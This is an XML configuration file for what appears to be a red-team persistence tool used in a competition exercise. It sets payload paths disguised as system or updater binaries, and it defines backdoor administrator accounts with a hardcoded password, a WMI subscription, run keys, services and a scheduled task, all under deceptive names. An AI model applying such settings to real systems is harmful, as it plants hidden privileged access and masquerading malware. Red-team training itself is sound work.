<?xml version="1.0" encoding="utf-8" ?>
<configuration>
    <configSections>
        <section name="payload" type="System.Configuration.NameValueSectionHandler" />
        <sectionGroup name="techniques">
            <section name="AddWMI" type="System.Configuration.NameValueSectionHandler"/>
            <section name="AddUser" type="System.Configuration.NameValueSectionHandler"/>
            <section name="AddService" type="System.Configuration.NameValueSectionHandler"/>
            <section name="AddScheduledTask" type="System.Configuration.NameValueSectionHandler"/>
            <section name="AddRunKey" type="System.Configuration.NameValueSectionHandler"/> 
        </sectionGroup>
    </configSections>

    <payload>
        <add key="name" value="C:\ProgramData\Microsoft\Windows\MsUpdate.exe,C:\Windows\System32\ChromeUpdateMaster.exe,C:\ProgramData\ScoringEngineWorker.exe,C:\ProgramData\svchost.exe,C:\Windows\Microsoft.NET\Framework\sbs_mscorecompiler.exe,C:\Windows\System32\Microsoft\MSDBMaintain.exe,C:\Users\Default\svchost.exe"/>
    </payload>


    <techniques>
        <AddWMI>
            <add key="name" value="WindowsServiceUpdater"/>
        </AddWMI>
        <AddUser>
            <add key="usage" value="yes"/>
            <add key="usernames" value="joe,bob,scoringengine,blackteam,engine"/>
            <add key="password" value="LetRedIn!123"/>
            <add key="groups" value="Domain Admins,Administrators,Enterprise Admins"/>
        </AddUser>

        <AddRunKey>
            <add key="name" value="Application_Security,Backup,Appsec,Google Updates,Microsoft_Credential_Guard,MSCredUpdater,SysDriver64"/>
        </AddRunKey>

        <AddService>
            <add key="name" value="ApplicationSecurity,SplunkIRSECMonitor,DeviceAssociationUpdater"/>
        </AddService>

        <AddScheduledTask>
            <add key="name" value="ScoreStackCallBack"/>
            <add key="interval" value="120.0"/>
        </AddScheduledTask>

    </techniques>
</configuration>